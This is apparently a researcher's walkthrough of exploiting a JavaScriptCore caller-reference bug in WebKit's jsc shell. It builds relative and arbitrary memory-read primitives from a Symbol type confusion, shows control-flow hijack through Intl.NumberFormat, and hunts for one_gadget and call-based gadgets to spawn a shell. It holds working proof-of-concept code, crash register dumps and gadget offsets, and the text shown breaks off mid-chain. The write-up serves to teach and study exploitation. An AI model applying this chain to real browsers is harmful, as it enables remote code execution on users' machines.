Two helpful functions jsc adds to the interpreter are describe() and describeArray(). As these functions would not be present in an actual target interpreter, they are not fair game for use in an exploit, but they are very useful when debugging:

>>> a = [0x41, 0x42];
65,66
>>> describe(a);
Object: 0x7fc5663b01f0 with butterfly 0x7fc5663caec8 (0x7fc5663eac20:[Array, {}, ArrayWithInt32, Proto:0x7fc5663e4140, Leaf]), ID: 88
>>> describeArray(a);
<Butterfly: 0x7fc5663caec8; public length: 2; vector length: 3>

Symbols

Release builds of WebKit don’t have asserts enabled, but they also don’t have symbols. Since we want symbols, we will build with CFLAGS=-g CXXFLAGS=-g Tools/Scripts/build-webkit --jsc-only

The symbol information can take quite some time for the debugger to parse. We can reduce the debugger's load time significantly by running gdb-add-index on both jsc and libJavaScriptCore.so.
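Concretely, that is just pointing the tool at both binaries (paths assume the Release build tree used above; adjust to your setup):

$ gdb-add-index WebKitBuild/Release/bin/jsc
$ gdb-add-index WebKitBuild/Release/lib/libJavaScriptCore.so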

Dumping Object Layouts

WebKit ships with a script for macOS to dump the object layout of various classes, for example, here is JSC::JSString:

x@webkit:~/WebKit/Tools/Scripts$ ./dump-class-layout JSC JSString
Found 1 types matching "JSString" in "/home/x/WebKit/WebKitBuild/Release/lib/libJavaScriptCore.so"
  +0 { 24} JSString
  +0 {  8}     JSC::JSCell
  +0 {  1}         JSC::HeapCell
  +0 <  4>         JSC::StructureID m_structureID;
  +4 <  1>         JSC::IndexingType m_indexingTypeAndMisc;
  +5 <  1>         JSC::JSType m_type;
  +6 <  1>         JSC::TypeInfo::InlineTypeFlags m_flags;
  +7 <  1>         JSC::CellState m_cellState;
  +8 <  4>     unsigned int m_flags;
 +12 <  4>     unsigned int m_length;
 +16 <  8>     WTF::String m_value;
 +16 <  8>         WTF::RefPtr<WTF::StringImpl> m_impl;
 +16 <  8>             WTF::StringImpl * m_ptr;
Total byte size: 24
Total pad bytes: 0

This script required minor modifications to run on Linux, but it was quite useful later on.

Bug

With our target built and tooling set up, let’s dig into the bug a bit. JavaScript (apparently) has a feature to get the caller of a function:

var q;

function f() {
    q = f.caller;
}

function g() {
    f();
}

g(); // ‘q’ is now equal to ‘g’

This behavior is disabled under certain conditions, notably if the JavaScript code is running in strict mode. The specific bug here is that if you called from a strict function to a non-strict function, JSC would allow you to get a reference to the strict function. From the PoC provided you can see how this is a problem:

var q;
// this is a non-strict chunk of code, so getting the caller is allowed
function g(){
    q = g.caller;
    return 7;
}

var a = [1, 2, 3];
a.length = 4;
// when anything, including the runtime, accesses a[3], g will be called
Object.defineProperty(Array.prototype, "3", {get : g});
// trigger the runtime access of a[3]
[4, 5, 6].concat(a);
// q now is a reference to an internal runtime function
q(0x77777777, 0x77777777, 0); // crash

In this case, the concat code is in Source/JavaScriptCore/builtins/ArrayPrototype.js and is marked as ‘use strict’.

This behavior is not always exploitable: we need a JS runtime function ‘a’ which performs sanitization on arguments, then calls another runtime function ‘b’ which can be coerced into executing user-supplied JavaScript, giving us a function reference to ‘b’. This allows us to do b(0x41, 0x42), skipping the sanitization on our inputs which ‘a’ would normally perform.

The JSC runtime is a combination of JavaScript and C++ which kind of looks like this:

+-------------+
| User Code   | <- user-provided code
+-------------+
| JS Runtime  | <- JS that ships with the browser as part of the runtime
+-------------+
| Cpp Runtime | <- C++ that implements the rest of the runtime
+-------------+

The Array.concat above is a good example of this pattern: when concat() is called it first goes into ArrayPrototype.js to perform sanitization on the argument, then calls into one of the concat implementations. The fastpath implementations are generally written in C++, while the slowpaths are either pure JS, or a different C++ implementation.

What makes this bug useful is the reference to the function we get (‘q’ in the above snippet) is after the input sanitization performed by the JavaScript layer, meaning we have a direct reference to the native function.

The provided PoC is an especially powerful example of this, however there are others -- some useful, some worthless. In terms of a general plan, we’ll need to use this bug to create an infoleak to defeat ASLR, then figure out a way to use it to hijack control flow and get a shell out of it.

Infoleak

Defeating ASLR is the first order of business. To do this, we need to understand the reference we have in the concat code.

concat in more detail

Tracing the codepath from our concat call, we start in Source/JavaScriptCore/builtins/ArrayPrototype.js:

function concat(first)
{
    "use strict";

    // [1] perform some input validation
    if (@argumentCount() === 1
        && @isJSArray(this)
        && this.@isConcatSpreadableSymbol === @undefined
        && (!@isObject(first) || first.@isConcatSpreadableSymbol === @undefined)) {

        let result = @concatMemcpy(this, first); // [2] call the fastpath
        if (result !== null)
            return result;
    }

    // … snip ...

In this code snippet the @ is the interpreter glue which tells the JavaScript engine to look in the C++ bindings for the specified symbol. These functions are only callable via the JavaScript runtime which ships with WebKit, not user code. If you follow this through some indirection, you will find @concatMemcpy corresponds to arrayProtoPrivateFuncAppendMemcpy in Source/JavaScriptCore/runtime/ArrayPrototype.cpp:

EncodedJSValue JSC_HOST_CALL arrayProtoPrivateFuncAppendMemcpy(ExecState* exec)
{
    ASSERT(exec->argumentCount() == 3);

    VM& vm = exec->vm();
    JSArray* resultArray = jsCast<JSArray*>(exec->uncheckedArgument(0));
    JSArray* otherArray = jsCast<JSArray*>(exec->uncheckedArgument(1));
    JSValue startValue = exec->uncheckedArgument(2);
    ASSERT(startValue.isAnyInt() && startValue.asAnyInt() >= 0 && startValue.asAnyInt() <= std::numeric_limits<unsigned>::max());
    unsigned startIndex = static_cast<unsigned>(startValue.asAnyInt());
    if (!resultArray->appendMemcpy(exec, vm, startIndex, otherArray)) // [3] fastpath...
    // … snip ...
}

Which finally calls into appendMemcpy in JSArray.cpp:

bool JSArray::appendMemcpy(ExecState* exec, VM& vm, unsigned startIndex, JSC::JSArray* otherArray)
{
    // … snip ...

    unsigned otherLength = otherArray->length();
    unsigned newLength = startIndex + otherLength;
    if (newLength >= MIN_SPARSE_ARRAY_INDEX)
        return false;

    if (!ensureLength(vm, newLength)) { // [4] check dst size
        throwOutOfMemoryError(exec, scope);
        return false;
    }
    ASSERT(copyType == indexingType());

    if (type == ArrayWithDouble)
        memcpy(butterfly()->contiguousDouble().data() + startIndex, otherArray->butterfly()->contiguousDouble().data(), sizeof(JSValue) * otherLength);
    else
        memcpy(butterfly()->contiguous().data() + startIndex, otherArray->butterfly()->contiguous().data(), sizeof(JSValue) * otherLength); // [5] do the concat

    return true;
}

This may seem like a lot of code, but given Arrays src and dst, it boils down to this:

# JS Array.concat
def concat(dst, src):
    if typeof(dst) == Array and typeof(src) == Array: concatFastPath(dst, src)
    else: concatSlowPath(dst, src)

# C++ concatMemcpy / arrayProtoPrivateFuncAppendMemcpy
def concatFastPath(dst, src):
    appendMemcpy(dst, src)

# C++ appendMemcpy
def appendMemcpy(dst, src):
    if allocated_size(dst) < sizeof(dst) + sizeof(src):
        resize(dst)

    memcpy(dst + sizeof(dst), src, sizeof(src));

However, thanks to our bug we can skip the type validation at [1] and call arrayProtoPrivateFuncAppendMemcpy directly with non-Array arguments! This turns the logic bug into a type confusion and opens up some exploitation possibilities.

JSObject layouts

To understand the bug a bit better, let’s look at the layout of JSArray:

x@webkit:~/WebKit/Tools/Scripts$ ./dump-class-layout JSC JSArray
Found 1 types matching "JSArray" in "/home/x/WebKit/WebKitBuild/Release/lib/libJavaScriptCore.so"
  +0 { 16} JSArray
  +0 { 16}     JSC::JSNonFinalObject
  +0 { 16}         JSC::JSObject
  +0 {  8}             JSC::JSCell
  +0 {  1}                 JSC::HeapCell
  +0 <  4>                 JSC::StructureID m_structureID;
  +4 <  1>                 JSC::IndexingType m_indexingTypeAndMisc;
  +5 <  1>                 JSC::JSType m_type;
  +6 <  1>                 JSC::TypeInfo::InlineTypeFlags m_flags;
  +7 <  1>                 JSC::CellState m_cellState;
  +8 <  8>             JSC::AuxiliaryBarrier<JSC::Butterfly *> m_butterfly;
  +8 <  8>                 JSC::Butterfly * m_value;
Total byte size: 16
Total pad bytes: 0

The memcpy we’re triggering uses butterfly()->contiguous().data() + startIndex as a dst, and while this may initially look complicated, most of this compiles away. butterfly() simply returns the object’s butterfly pointer, as detailed in saelo’s Phrack article, and the contiguous().data() portion effectively disappears. startIndex is fully controlled as well, so we can make this 0. As a result, our memcpy reduces to: memcpy(qword ptr [obj + 8], qword ptr [src + 8], sizeof(src)). To exploit this we simply need an object which has a non-butterfly pointer at offset +8.

This turns out to not be simple. Most objects I could find inherited from JSObject, meaning they inherited the butterfly pointer field at +8. In some cases (e.g. ArrayBuffer) this value was simply NULL’d, while in others I wound up type confusing a butterfly with another butterfly, to no effect. JSStrings were particularly frustrating, as the relevant portions of their layout were:

+8    flags  : u32
+12   length : u32

The length field was controllable via user code, however the flags were not. This gave me a primitive where I could control the top 32 bits of a pointer, and while this might have been doable with some heap spray, I elected to Find a Better Bug(™).

Salvation Through Symbols

My basic process at this point was to look at MDN for the types I could instantiate from the interpreter. Most of these were either boxed (integers, bools, etc), Objects, or Strings. However, Symbol is a JS primitive that had a potentially useful layout:

x@webkit:~/WebKit/Tools/Scripts$ ./dump-class-layout JSC Symbol
Found 1 types matching "Symbol" in "/home/x/WebKit/WebKitBuild/Release/lib/libJavaScriptCore.so"
  +0 { 16} Symbol
  +0 {  8}     JSC::JSCell
  +0 {  1}         JSC::HeapCell
  +0 <  4>         JSC::StructureID m_structureID;
  +4 <  1>         JSC::IndexingType m_indexingTypeAndMisc;
  +5 <  1>         JSC::JSType m_type;
  +6 <  1>         JSC::TypeInfo::InlineTypeFlags m_flags;
  +7 <  1>         JSC::CellState m_cellState;
  +8 <  8>     JSC::PrivateName m_privateName;
  +8 <  8>         WTF::Ref<WTF::SymbolImpl> m_uid;
  +8 <  8>             WTF::SymbolImpl * m_ptr;
Total byte size: 16
Total pad bytes: 0

At +8 we have a pointer to a non-butterfly! Additionally, this object passes all the checks on the above code path, leading to a potentially controlled memcpy on top of the SymbolImpl. Now we just need a way to turn this into an infoleak...

Diagrams

WTF::SymbolImpl’s layout:

x@webkit:~/WebKit/Tools/Scripts$ ./dump-class-layout WTF SymbolImpl
Found 1 types matching "SymbolImpl" in "/home/x/WebKit/WebKitBuild/Release/lib/libJavaScriptCore.so"
  +0 { 48} SymbolImpl
  +0 { 24}     WTF::UniquedStringImpl
  +0 { 24}         WTF::StringImpl
  +0 <  4>             unsigned int m_refCount;
  +4 <  4>             unsigned int m_length;
  +8 <  8>             WTF::StringImpl::(anonymous union) None;
 +16 <  4>             unsigned int m_hashAndFlags;
 +20 <  4>             <PADDING>
 +20 <  4>         <PADDING>
 +20 <  4>     <PADDING>
 +24 <  8>     WTF::StringImpl * m_owner;
 +32 <  8>     WTF::SymbolRegistry * m_symbolRegistry;
 +40 <  4>     unsigned int m_hashForSymbol;
 +44 <  4>     unsigned int m_flags;
Total byte size: 48
Total pad bytes: 12
Padding percentage: 25.00 %

The codepath we’re on expects a butterfly with memory layout simplified to the following:

       -8   -4     +0  +8  +16
+---------------------+---+-----------+
|pub length|length| 0 | 1 | 2 |...| n |
+---------------------+---+-----------+
                  ^
+-------------+   |
|butterfly ptr+---+
+-------------+

However, we’re providing it with something like this:

                    +0       +4     +8
+-----------------------------------------------+
|       OOB        |refcount|length|str base ptr|
+-----------------------------------------------+
                   ^
+--------------+   |
|SymbolImpl ptr+---+
+--------------+

If we recall our earlier pseudocode:

def appendMemcpy(dst, src):
    if allocated_size(dst) < sizeof(dst) + sizeof(src):
        resize(dst)

    memcpy(dst + sizeof(dst), src, sizeof(src));

In the normal butterfly case, it will check the length and public length fields, located at -4 and -8 from the butterfly pointer (i.e. btrfly[-1] and btrfly[-2] respectively). However, when passing Symbols in our type-confused case, those array accesses will be out of bounds, and thus potentially controllable. Let’s walk through the two possibilities.

OOB memory is a large value

Let’s presume we have a memory layout similar to:

  OOB    OOB
+------------------------------------------+
|0xffff|0xffff|refcount|length|str base ptr|
+------------------------------------------+
              ^
        +---+ |
        |ptr+-+
        +---+

The exact OOB values won’t matter, as long as they’re greater than the size of the dst plus the src. In this case, resize in our pseudocode or ensureLength ([4]) in the actual code will not trigger a reallocation and object move, resulting in a direct memcpy on top of refcount and length. From here, we can turn this into a relative read infoleak by overwriting the length field.
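As a quick aside before we trigger it: the busted_concat used below is the same caller-bug capture from the PoC earlier, just stashed under a new name. Roughly:

var busted_concat;
function g() {
    // grab our strict caller: per the earlier analysis, a direct reference
    // to the native fastpath, past concat's JS-side sanitization
    busted_concat = g.caller;
    return 7;
}
var a = [1, 2, 3];
a.length = 4;
Object.defineProperty(Array.prototype, "3", {get : g});
[4, 5, 6].concat(a);
// busted_concat(dst, src, startIndex) now behaves like a raw memcpy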

For example, if we store a function reference to arrayProtoPrivateFuncAppendMemcpy in a variable named busted_concat and then trigger the bug, like this:

let x = Symbol("AAAA");

let y = [];
y.push(new Int64('0x000042420000ffff').asDouble());

busted_concat(x, y, 0);

Note: Int64 can be found here and is, of course, covered in saelo’s Phrack article.

We would then end up with a Symbol x with fields:

 refcount length
+----------------------------+
| 0x4242 |0xffff|str base ptr|
+----------------------------+

str base ptr will point to AAAA, however instead of having a length of 4, it will have a length of 0xffff. To access this memory, we can extract the String from a Symbol with:

let leak = x.toString().charCodeAt(0x1234);

toString() in this case is actually kind of complicated under the hood. My understanding is that all strings in JSC are “roped”, meaning any existing substrings are linked together with pointers as opposed to being laid out linearly in memory. However, this detail doesn’t really affect us; for our purposes a string is created out of our controlled length and the existing string base pointer, with no terminating characters to be concerned with. It is possible to crash here if we were to index outside of mapped memory, but this hasn’t happened in my experience. As an additional minor complication, strings come in two varieties, 8bit and UTF-16. We can easily work around this with a basic heuristic: if we read any values larger than 255 we just assume it is a UTF-16 string.

None of this changes the outcome of the snippet above: leak now contains the contents of OOB memory. Boom, relative memory read :)
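Wrapped up into a helper, the relative read looks something like this sketch (assuming the smashed Symbol from above is in x and its string reads as 8bit, per the heuristic just described):

function rel_read64(offset) {
    // each charCodeAt() indexes off the SymbolImpl's string base pointer
    let s = x.toString();
    let hex = '';
    for (let i = 7; i >= 0; i--) {
        let b = s.charCodeAt(offset + i) & 0xff;
        hex += ('0' + b.toString(16)).slice(-2);
    }
    return new Int64('0x' + hex); // little-endian qword at str_base + offset
}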

OOB Memory is a zero

On the other hand, let’s assume the OOB memory immediately before our target SymbolImpl is all zeros. In this case, resize / ensureLength will trigger a reallocation and object move. ensureLength more or less corresponds to the following pseudocode:

if sizeof(this.butterfly) + sizeof(other.butterfly) > this.sz:
    new_btrfly =  alloc(sizeof(this.butterfly) + sizeof(other.butterfly));
    memcpy(new_btrfly, this.butterfly, sizeof(this.butterfly));
    this.butterfly = new_btrfly;

Or in words: if the existing butterfly isn’t large enough to hold a combination of the two butterflies, allocate a larger one, copy the existing butterfly contents into it, and assign it. Note that this does not actually do the concatenation, it just makes sure the destination will be large enough when the concatenation is actually performed.

This turns out to also be quite useful to us, especially if we already have the relative read above. Assuming we have a SymbolImpl starting at address 0x4008 with a memory layout of:

          OOB    OOB
        +------------------------------------------+
0x4000: |0x0000|0x0000|refcount|length|str base ptr|
        +------------------------------------------+
                      ^
                +---+ |
                |ptr+-+
                +---+

And, similar to the large value case above, we trigger the bug:

let read_target = '0xdeadbeef';

let x = Symbol("AAAA");

let y = [];
y.push(new Int64('0x000042420000ffff').asDouble());
y.push(new Int64(read_target).asDouble());

busted_concat(x, y, 0);

We end up with a “SymbolImpl” at a new address, 0x8000:

         refcount length str base ptr
        +----------------------------+
0x8000: | 0x4242 |0xffff| 0xdeadbeef |
        +----------------------------+

In this case, we’ve managed to conjure a complete SymbolImpl! We might not need to allocate a backing string for this Symbol (i.e. “AAAA”), but doing so can make it slightly easier to debug. The ensureLength code basically decided to “resize” our SymbolImpl, and by doing so allowed us to fully control the contents of a new one. This now means that if we do

let leak = x.toString().charCodeAt(0x5555);

We will be dereferencing *(0xdeadbeef + 0x5555), giving us a completely arbitrary memory read. Obviously this depends on a relative leak; otherwise we wouldn’t have a valid mapped address to target. Additionally, we could have overwritten the str base pointer in the non-zero length case (because the memcpy is based on the size of the source), but I found this method to be slightly more stable and repeatable.

With this done we now have both relative and arbitrary infoleaks :)

Notes on fastMalloc

We will get into more detail on this in a second, however I want to cover how we control the first bytes prior to the SymbolImpl, as being able to control which ensureLength codepath we hit is important (we need to get the relative leak before the absolute). This is partially where targeting jsc instead of WebKit proper made my life easier: I had a more or less deterministic heap layout across all of my runs, specifically:

// this symbol will always pass the ensureLength check
let x = Symbol('AAAA');

function y() {
    // this symbol will always fail the ensureLength check
    let z = Symbol('BBBB');
}

To be honest, I didn’t find the root cause for why this was the case; I just ran with it. SymbolImpl objects here are allocated via fastMalloc, which seems to be used primarily by the JIT, SymbolImpl, and StringImpl. Additionally (and unfortunately) fastMalloc is used by print(), meaning if we were interested in porting our exploit from jsc to WebKit we would likely have to redo most of the heap offsets (in addition to spraying to get control over the ensureLength codepath).

While this approach is untested, something like

let x = 'AAAA'.blink();

will cause AAAA to be allocated inline with the allocation metadata via fastMalloc, as long as your target string is short enough. By spraying a few blink’d objects to fill in any holes, it should be possible to control ensureLength and get the relative infoleak needed to make the absolute infoleak.
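Concretely, the spray might look something like this (equally untested):

// fill any fastMalloc holes with small, inline-allocated strings so the
// Symbols we allocate afterwards land at predictable spots
let spray = [];
for (let i = 0; i < 0x1000; i++)
    spray.push(('A' + i).blink());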

Arbitrary Write

Let’s recap where we are, where we’re trying to go, and what’s left to do:

We can now read and leak arbitrary browser memory. We have a promising-looking primitive for a memory write (the memcpy in the case where we do not resize). If we can turn that relative memory write into an arbitrary write we can move on to targeting some vtables or saved program counters on the stack, and hijack control flow to win.

How hard could this be?

Failure: NaN boxing

One of the first ideas I had to get an arbitrary write was passing it a numeric value as the dst. Our busted_concat can be simplified to a weird version of memcpy(), and instead of passing it memcpy(Symbol, Array, size) could we pass it something like memcpy(0x41414141, Array, size)? We would need to create an object at the address we passed in, but that shouldn’t be too difficult at this point: we have a good infoleak and the ability to instantiate memory with arbitrary values via ArrayWithDouble. Essentially, this is asking if we can use this function reference to get us a fakeobj()-like primitive. There are basically two possibilities to try, and neither of them works.

First, let’s take the integer case. If we pass 0x41414141 as the dst parameter, this will be encoded into a JSValue of 0xffff000041414141. That’s a non-canonical address, and even if it weren’t, it would be in kernel space. Due to this integer tagging, it is impossible to get a JSValue that is an integer which is also a valid mapped memory address, so the integer path is out.

Second, let’s examine what happens if we pass it a double instead: memcpy(new Int64(0x41414141).asDouble(), Array, size). In this case, the double should be using all 64 bits of the address, so it might be possible to construct a double whose representation is a mapped memory location. However, JavaScriptCore handles this case as well: they use a floating point representation which has 0x0001000000000000 added to the value when expressed as a JSValue. This means, like integers, doubles can never correspond to a useful memory address.

For more information on this, check out this comment in JSCJSValue.h which explains the value tagging in more detail.
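As a quick arithmetic sanity check (a sketch; the constant is the double-encode offset from that comment):

// the double whose raw bits spell our target address gets 2^48 added when
// boxed; the addition only ever touches the high 32 bits of the value
function boxedDoubleBits(hi, lo) {
    return [(hi + 0x10000) >>> 0, lo >>> 0]; // 2^48 == 0x10000 << 32
}
let [hi, lo] = boxedDoubleBits(0x00000000, 0x41414141);
// hi == 0x00010000: the runtime sees 0x0001000041414141, never 0x41414141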

Failure: Smashing fastMalloc

In creating our relative read infoleak, we only overwrote the refcount and length fields of the target SymbolImpl. However, this memcpy should be significantly more useful to us: because the size of the copy is related to the size of the source, we can overwrite as far as the OOB size field allows. Practically, this turns into an arbitrary overwrite of SymbolImpls.

As mentioned previously, SymbolImpls get allocated via fastMalloc. To figure this out, we need to leave JSC and check out the Web Template Framework, or WTF. WTF, for lack of a better analogy, forms a kind of stdlib that JSC is built on top of. If we look up WTF::SymbolImpl from our class dump above, we find it in Source/WTF/wtf/text/SymbolImpl.h. Specifically, these are the class declarations that are of interest to us:

class SymbolImpl : public UniquedStringImpl {

Source/WTF/wtf/text/UniquedStringImpl.h

class UniquedStringImpl : public StringImpl {

/Source/WTF/wtf/text/StringImpl.h

class StringImpl {
    WTF_MAKE_NONCOPYABLE(StringImpl); WTF_MAKE_FAST_ALLOCATED;

WTF_MAKE_FAST_ALLOCATED is a macro which expands to cause objects of this type to be allocated via fastMalloc. This helps form our target list: anything that is tagged with WTF_MAKE_FAST_ALLOCATED, or allocated directly via fastMalloc, is suitable, as long as we can force an allocation from the interpreter.

To save some space: I was unsuccessful at finding any way to turn this fastMalloc overflow into an arbitrary write. At one point I was absolutely convinced I had a method of partially overwriting a SymbolImpl, converting it to a String, then overwriting that, thus bypassing the flags restriction mentioned earlier... but this didn’t work (I confused JSC::JSString with WTF::StringImpl, amongst other problems).

All the things I could find to overwrite in the fastMalloc heap were either Strings (or String-like things, e.g. Symbols) or were JIT primitives I didn’t want to try to understand. Alternatively I could have tried to target fastMalloc metadata attacks -- for some reason this didn’t occur to me until much later and I haven’t looked at this at all.

Remember when I mentioned the potential downsides of targeting jsc specifically? This is where they start to come into play. It would be really nice at this point to have a richer set of objects to target here, specifically DOM or other browser objects. More objects would give me additional avenues on three fronts: more possibilities to type confuse my existing busted functions, more possibilities to overflow in the fastMalloc heap, and more possibilities to obtain references to useful functions.

At this point I decided to try to find a different chain of function calls which would use the same bug but give me a reference to a different runtime function.

Control Flow

My general workflow when auditing other functions for our candidate pattern was to look at the code exposed via builtins, find native functions, and then audit those native functions looking for places where JSValues were evaluated. While this found other instances of this pattern (e.g. in the RegExp code), they were not usable -- the C++ runtime functions would do additional checks and error out. However, when searching, I stumbled onto another p0 bug with the same CVE attributed, p0 bug 1036. Reproducing from the PoC there:

var i = new Intl.DateTimeFormat();
var q;

function f(){
    q = f.caller;
    return 10;
}


i.format({valueOf : f});

q.call(0x77777777);

This bug is very similar to our earlier bug, and originally I was confused as to why it was a separate p0 bug. Both bugs manifest in the same way, by giving you a non-properly-typechecked reference to a function; however, the root cause that makes each bug possible is different. In the appendMemcpy case it is due to a lack of checks on use strict code, while this one appears to be a “regular” type confusion, unrelated to use strict. These bugs, while different, are similar enough that they share a CVE and a fix.

So, with this understood can we use Intl.DateTimeFormat usefully to exploit jsc?

Intl.DateTimeFormat Crash

What’s the outcome if we run that PoC?

Thread 1 "jsc" received signal SIGSEGV, Segmentation fault.
…
$rdi   : 0xffff000077777777
...
 → 0x7ffff77a8960 <JSC::IntlDateTimeFormat::format(JSC::ExecState&,+0> cmp    BYTE PTR [rdi+0x18], 0x0

Ok, so we’re treating a NaN boxed integer as an object. What if we pass it an object instead?

// ...
q.call({a: new Int64('0x41414141')});

Results in:

Thread 1 "jsc" received signal SIGSEGV, Segmentation fault.
...
$rdi   : 0x0000000000000008
 ...
 → 0x7ffff77a4833 <JSC::IntlDateTimeFormat::initializeDateTimeFormat(JSC::ExecState&,+0> mov    eax, DWORD PTR [rdi]

Hmm.. this also doesn’t look immediately useful. As a last-ditch attempt, reading the docs we notice there are both an Intl.DateTimeFormat and an Intl.NumberFormat with a similar format call. Let’s try getting a reference to that function instead:

load('utils.js')
load('int64.js');

var i = new Intl.NumberFormat();
var q;

function f(){
        q = f.caller;
        return 10;
}


i.format({valueOf : f});

q.call({a: new Int64('0x41414141')});

Giving us:

Thread 1 "jsc" received signal SIGSEGV, Segmentation fault.
…
$rax   : 0x0000000041414141
…
 → 0x7ffff4b7c769 <unum_formatDouble_57+185> call   QWORD PTR [rax+0x48]

Yeah, we can probably exploit this =p

I’d like to say that finding this was due to a deep reading and understanding of WebKit’s internationalization code, but really I was just trying things at random until something crashed in a useful-looking state. I’m sure I tried dozens of other things that didn’t end up working out along the way... From a pedagogical perspective, I’m aware that listing random things I tried is not exactly optimal, but that’s actually how I did it so :)

Exploit Planning

Let’s pause to take stock of where we’re at:

  • We have an arbitrary infoleak
  • We have a relative write and no good way to expand it to an arbitrary write
  • We have control over the program counter

Using the infoleak we can find pretty much anything we want, thanks to linux loader behavior (libc.so.6 and thus system() will always be at a fixed offset from libJavaScriptCore.so, whose base address we have already leaked). A “proper” exploit would take arbitrary shellcode and result in its execution, but we can settle for popping a shell.
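In code, that resolution is just pointer arithmetic -- a sketch using int64.js's Add/Sub helpers, with made-up constants (the real, box-specific values come from your own process mappings):

// hypothetical constants for illustration -- recompute these for your box
const LIBJSC_TO_LIBC = new Int64('0x0000000003152000'); // placeholder delta
const SYSTEM_OFF     = new Int64('0x45390');            // placeholder offset
let libc_base = Sub(libjsc_base, LIBJSC_TO_LIBC); // libjsc_base: leaked above
let system_addr = Add(libc_base, SYSTEM_OFF);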

The ideal case here would be that we have control over rdi and can just point rip at system(), and we’d be done. Let’s look at the register state where we hijack control flow, with pretty printing from @_hugsy’s excellent gef.

$rax   : 0x0000000041414141
$rbx   : 0x0000000000000000
$rcx   : 0x00007fffffffd644  →  0xb2de45e000000000
$rdx   : 0x00007fffffffd580  →  0x00007ffff4f14d78  →  0x00007ffff4b722d0  →  <icu_57::FieldPosition::~FieldPosition()+0> lea rax, [rip+0x3a2a91]        # 0x7ffff4f14d68 <_ZTVN6icu_5713FieldPositionE>
$rsp   : 0x00007fffffffd570  →  0x7ff8000000000000
$rbp   : 0x00007fffffffd5a0  →  0x00007ffff54dfc00  →  0x00007ffff51f30e0  →  <icu_57::UnicodeString::~UnicodeString()+0> lea rax, [rip+0x2ecb09]        # 0x7ffff54dfbf0 <_ZTVN6icu_5713UnicodeStringE>
$rsi   : 0x00007fffffffd5a0  →  0x00007ffff54dfc00  →  0x00007ffff51f30e0  →  <icu_57::UnicodeString::~UnicodeString()+0> lea rax, [rip+0x2ecb09]        # 0x7ffff54dfbf0 <_ZTVN6icu_5713UnicodeStringE>
$rdi   : 0x00007fffb2d5c120  →  0x0000000041414141 ("AAAA"?)
$rip   : 0x00007ffff4b7c769  →  <unum_formatDouble_57+185> call QWORD PTR [rax+0x48]
$r8    : 0x00007fffffffd644  →  0xb2de45e000000000
$r9    : 0x0000000000000000
$r10   : 0x00007ffff35dc218  →  0x0000000000000000
$r11   : 0x00007fffb30065f0  →  0x00007fffffffd720  →  0x00007fffffffd790  →  0x00007fffffffd800  →  0x00007fffffffd910  →  0x00007fffb3000000  →  0x0000000000000003
$r12   : 0x00007fffffffd644  →  0xb2de45e000000000
$r13   : 0x00007fffffffd660  →  0x0000000000000000
$r14   : 0x0000000000000020
$r15   : 0x00007fffb2d5c120  →  0x0000000041414141 ("AAAA"?)

So, rax is fully controlled, and rdi and r15 point at our controlled data. Nothing else seems particularly useful. The ideal case is probably out, barring some significant memory sprays to get memory addresses that double as useful strings. Let’s see if we can do it without rdi.

one_gadget

On linux, there is a handy tool for this by @david924j called one_gadget. one_gadget is pretty straightforward in its use: you give it a libc, it gives you the offsets and constraints for PC values that will get you a shell. In my case:

x@webkit:~$ one_gadget /lib/x86_64-linux-gnu/libc.so.6
0x41bce execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x41c22 execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xe1b3e execve("/bin/sh", rsp+0x60, environ)
constraints:
  [rsp+0x60] == NULL

So, we have three constraints, and if we can satisfy any one of them, we’re done. Obviously the first is out -- we take control of PC with a call [rax+0x48] so rax cannot be NULL. So, now we’re looking at stack contents. Because nothing is ever easy, neither of the stack-based constraints is met either. Since the easy solutions are out, let’s look at what we have in a little more detail.

Memory layout and ROP

       +------------------+
rax -> |0xdeadbeefdeadbeef|
       +------------------+
       |        ...       |
       +------------------+
+0x48  |0x4141414141414141| <- new rip
       +------------------+

To usefully take control of execution, we will need to construct an array with our target PC value at offset +0x48, then call our type confusion with that value. Because we can construct ArrayWithDoubles with arbitrary contents, this isn’t really a problem: populate the array, use our infoleak to find the array base, and use that as the type confusion value.

A normal exploit path in this case would focus on getting a stack pivot and setting up a ROP chain. In our case, if we wanted to try this, the code we would need would be something like:

mov X, [rdi] ; or r15
mov Y, [X]
mov rsp, Y
ret

Where X and Y can be any register. While some code with these properties likely exists inside some of the mapped executable code in our address space, searching for it would require some more complicated tooling than I was familiar with or felt like learning. So ROP is probably out for now.

Reverse gadgets

By this point we are very familiar with the fact that WebKit is C++, and C++ famously makes heavy use of function indirection, much to the despair of reverse engineers and the glee of exploit writers. Normally in a ROP chain we find snippets of code and chain them together, using ret to transfer control flow between them, but that won’t work in this case. However, what if we could leverage C++’s indirection to get the ability to execute gadgets? In our specific current case, we’re taking control of PC on a call [rax + 0x48], with a fully controlled rax. Instead of looking for gadgets that end in ret, what if we look for gadgets that end in call [rax + n] and stitch them together?

x@webkit:~$ objdump -M intel -d ~/WebKit/WebKitBuild/Release/lib/libJavaScriptCore.so \
    | grep 'call   QWORD PTR \[rax' \
    | wc -l
7214

7214 gadgets is not a bad playground to choose from. Obviously objdump is not the best disassembler for this as it won’t find all instances (e.g. overlapping/misaligned instructions), but it should be good enough for our purposes. Let’s combine this idea with one_gadget constraints. We need a series of gadgets that:

  • Zero a register
  • Write that register to [rsp+0x28] or [rsp+0x58]
  • All of which end in a call [rax+n], with each n being unique

Why +0x28 or +0x58 instead of +0x30 or +0x60 like one_gadget’s output? Because the final call into one_gadget will push the next PC onto the stack, offsetting it by 8. With a little bit of grepping, this was surprisingly easy to find. We’re going to search backwards; first, let’s go for the stack write.

x@webkit:~$ objdump -M intel -d ~/WebKit/WebKitBuild/Release/lib/libJavaScriptCore.so \
    | grep -B1 'call   QWORD PTR \[rax' \
    | grep -A1 'mov    QWORD PTR \[rsp+0x28\]'
...
  5f6705:       4c 89 44 24 28          mov    QWORD PTR [rsp+0x28],r8
  5f670a:       ff 50 60                call   QWORD PTR [rax+0x60]
...

This finds us four unique results, with the one we’ll use being the only one listed. Cool, now we just need to find a gadget to zero r8...

x@webkit:~$ objdump -M intel -d ~/WebKit/WebKitBuild/Release/lib/libJavaScriptCore.so \
    | grep -B4 'call   QWORD PTR \[rax' \
    | grep -A4 'xor    r8'
…
  333503:       45 31 c0                xor    r8d,r8d
  333506:       4c 89 e2                mov    rdx,r12
  333509:       48 89 de                mov    rsi,rbx
  33350c:       ff 90 f8 00 00 00       call   QWORD PTR [rax+0xf8]
...

